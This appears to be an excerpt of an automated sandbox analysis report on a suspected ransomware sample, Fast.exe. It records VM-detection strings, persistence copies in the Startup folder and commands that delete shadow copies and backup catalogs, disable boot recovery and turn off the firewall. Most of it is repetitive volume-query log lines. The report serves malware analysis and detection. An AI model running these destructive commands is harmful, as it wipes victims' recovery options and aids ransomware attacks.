Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: vds.exe, 00000018.00000003.2229123796.0000023C61868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: vds.exe, 00000018.00000003.2246860462.0000023C6187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.manb
Source: vds.exe, 00000018.00000003.2242192548.0000023C6187F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Ph
Source: vds.exe, 00000018.00000003.2246726317.0000023C61887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2233616626.0000023C61868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Fast.exeAPI call chain: ExitProcess graph end nodegraph_2-3699
Source: C:\Users\user\Desktop\Fast.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA90A1 GetProcessHeap,RtlFreeHeap,2_2_00CA90A1
Source: C:\Users\user\Desktop\Fast.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quietJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall set opmode mode=disable
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA4428 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,LookupAccountSidW,GetLastError,FreeSid,2_2_00CA4428
Source: C:\Users\user\Desktop\Fast.exeCode function: GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle,2_2_00CA29F5
Source: C:\Users\user\AppData\Local\Fast.exeCode function: GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle,14_2_000D29F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle,25_2_002029F5
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
